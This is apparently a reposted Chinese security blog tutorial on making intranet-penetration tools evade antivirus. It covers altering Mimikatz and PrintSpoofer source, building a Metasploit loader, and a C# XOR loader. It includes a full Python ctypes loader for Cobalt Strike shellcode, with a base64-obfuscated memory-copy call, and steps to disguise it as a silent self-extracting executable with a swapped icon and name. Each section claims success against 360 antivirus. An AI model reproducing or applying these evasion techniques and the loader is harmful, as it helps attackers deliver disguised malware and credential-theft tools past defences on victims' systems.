「HVV须知」内网渗透-常用工具免杀

admin 2024年7月15日21:05:50评论180 views字数 2991阅读9分58秒阅读模式

Mimikatz免杀

Mimikatz其实并不只有抓取口令这个功能,它还能够创建票证、票证传递、hash传递、甚至伪造域管理凭证令牌等诸多功能。由于mimikatz的使用说明网上资料很多,这里就不多加介绍了,随着这两年hw行动越来越多,企事业单位也都开始注重内网安全,有预算的会上全套的终端安全、企业版杀软或者EDR,就算没有预算的也会装个360全家桶或者主机卫士之类的,这也导致很多时候你的mimikatz可能都没法拷贝过去或者没有加载执行,拿了台服务器却横向移不动就尴尬了。因为这款工具特别出名所以被查杀的机率很大, 我们可以通过 github 上的开源代码对其进行源码免杀从而 bypass 反病毒软件。Mimikatz 源代码下载 https://github.com/gentilkiwi/mimikatz免杀步骤替换 mimikatz 关键字 shenghuo「HVV须知」内网渗透-常用工具免杀mimikatz 下的文件全部改为 shenghu「HVV须知」内网渗透-常用工具免杀把项目里所有的文件注释去掉/ Benjamin DELPY gentilkiwi http://blog.gentilkiwi.com [email protected] Licence : https://creativecommons.org/licenses/by/4.0/ /「HVV须知」内网渗透-常用工具免杀打开红色框框内的内容,替换图标文件「HVV须知」内网渗透-常用工具免杀出现 无法找到 v140 的生成工具(平台工具集 =“v140”),要选择自己安装的平台工具集「HVV须知」内网渗透-常用工具免杀重新生成「HVV须知」内网渗透-常用工具免杀生成的程序能够正确运行「HVV须知」内网渗透-常用工具免杀成功过360「HVV须知」内网渗透-常用工具免杀PrintSpoofer做免杀printspoofer提权工具目前主流的提权工具之一,360 安全会自动查杀,其他杀毒软件并不会查杀。源码下载地址:https://github.com/itm4n/PrintSpoofer「HVV须知」内网渗透-常用工具免杀将PrintSpoofer.cpp 里面的输出帮助文档全部清空「HVV须知」内网渗透-常用工具免杀导入图标「HVV须知」内网渗透-常用工具免杀重新生成,程序生成成功「HVV须知」内网渗透-常用工具免杀

成功过360「HVV须知」内网渗透-常用工具免杀

msf免杀

metasploit 是一款开源的安全漏洞检测工具,同时Metasploit 是免费的工具,因此安全工作人员常用 Metasploit 工具来检测系统的安全性。Metasploit Framework (MSF) 在 2003 年以开放源码方式发布,是可以自由获取的开发框架。它是一个强大的开源平台,供开发,测试和使用恶意代码,这个环境为渗透测试、 shellcode 编写和漏洞研究提供了一个可靠平台。其中攻击载荷模块(Payload) , 在红队中是个香饽饽,使用这个模块生成的后门,不仅支持多种平台,而且 Metasploit 还有编码器模块(Encoders),生成后门前,对其进行编码转换,可以混 淆绕过一部分杀毒软件。工具 Dev-Cpp 5.11 TDM-GCC 4.9.2 Setup 下载地址 https://sourceforge.net/projects/orwelldevcpp/metasploit源码下载:metasploit-loader/master/src/main.c选择:文件->新建项目->consoleApplication->c 项目「HVV须知」内网渗透-常用工具免杀把winsock2.h 移动到windows.h 上 不然编译会出错。「HVV须知」内网渗透-常用工具免杀将这四处的数字改为其他数字「HVV须知」内网渗透-常用工具免杀设置攻击载荷,执行后成功上线「HVV须知」内网渗透-常用工具免杀成功过360「HVV须知」内网渗透-常用工具免杀

Python3 对Cobalt strike的 shellcode 做免杀

生成python64位的shellcode「HVV须知」内网渗透-常用工具免杀添加生成的shellcode

import ctypesimport base64#shellcode 加载def shellCodeLoad(shellcode):    ctypes.windll.kernel32.VirtualAlloc.restype = ctypes.c_uint64    ptr = ctypes.windll.kernel32.VirtualAlloc(ctypes.c_int(0),ctypes.c_int(len(shellcode)), ctypes.c_int(0x3000),ctypes.c_int(0x40))    buf= (ctypes.c_char * len(shellcode)).from_buffer(shellcode)    eval(base64.b64decode("Y3R5cGVzLndpbmRsbC5rZXJuZWwzMi5SdGxNb3ZlTW Vtb3J5KGN0eXBlcy5jX3VpbnQ2NChwdHIpLGJ1ZixjdHlwZXMuY19pbnQobGVuKHNoZWxsY29kZSkpKQ=="))    handle =ctypes.windll.kernel32.CreateThread(ctypes.c_int(0),ctypes.c_int(0),ctypes.c_uint64( ptr),ctypes.c_int(0),ctypes.c_int(0),ctypes.pointer(ctypes.c_int(0)))    ctypes.windll.kernel32.WaitForSingleObject(ctypes.c_int(handle),ctypes.c_int(-1))if __name__ == "__main__":    shellCodeLoad(bytearray(b'你的shellcode'))//这里为你的添加的shellcode位置

编译成程序pyinstaller -F test.py --noconsole此时还要做的就是更改图标,这里介绍一种方法首先右击它,选择“添加到压缩文件”「HVV须知」内网渗透-常用工具免杀在弹出来的一个“压缩文件名和参数”框中设置压缩文件格式为“ZIP”,压缩方式为“存储”,压缩选项为“创建自解压格式压缩文件”。「HVV须知」内网渗透-常用工具免杀随后选择“高级”选项卡。选择了“高级”选项卡以后直接点击“自解压选项”「HVV须知」内网渗透-常用工具免杀在设置选项卡中解压后运行对应程序「HVV须知」内网渗透-常用工具免杀在模式选项卡中选择解压临时文件夹和全部隐藏「HVV须知」内网渗透-常用工具免杀随后再选择“更新”选项卡,再覆盖方式中选择“覆盖所有文件”「HVV须知」内网渗透-常用工具免杀最后选择“文本和图标”选项卡,在自定义自解压文件徽标和图标中选择“从文件加载自解压文件图标”,点击“浏览”,找到自己想要加载的图标文件后并打开「HVV须知」内网渗透-常用工具免杀然后就点击确定(两次)就可以生成一个新的exe程序了。图标已经改变了,再运行测试一下「HVV须知」内网渗透-常用工具免杀上传去目标主机,这里更改了程序名称「HVV须知」内网渗透-常用工具免杀在线查杀「HVV须知」内网渗透-常用工具免杀

c# xor 加载器免杀cobaltstrike的shellcode

是很流行的编程语言,也可以用它来做一个加载器运行cobaltstrike的 shellcode,生成出来的 文件特别的小,可以很好的投递传输。项目地址 https://github.com/antman1p/ShellCodeRunner 用 vs2017 打开 sln 项目文件「HVV须知」内网渗透-常用工具免杀选择 xorkryptor 生成编码器 用 cobalt strike生成 raw 二进制文件「HVV须知」内网渗透-常用工具免杀encrypt.bin 就是经过编码后的文件「HVV须知」内网渗透-常用工具免杀项目里面存有 Rsources 和 encrypt.bin 文件 事实上项目是没有这个文件夹和文 件所以再当前目录新建文件夹和将生成好的shellcode文件 encrypt.bin 复制到文 件夹里。右键选择编译文件即可。「HVV须知」内网渗透-常用工具免杀此时文件正常「HVV须知」内网渗透-常用工具免杀重新编译,成功生成后门程序「HVV须知」内网渗透-常用工具免杀成功过360「HVV须知」内网渗透-常用工具免杀成功上线「HVV须知」内网渗透-常用工具免杀

本文源于奇安信攻防社区:

https://forum.butian.net/share/388 

如有侵权,请联系删除

原文始发于微信公众号(橘猫学安全):「HVV须知」内网渗透-常用工具免杀

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2024年7月15日21:05:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   「HVV须知」内网渗透-常用工具免杀https://cn-sec.com/archives/2957869.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息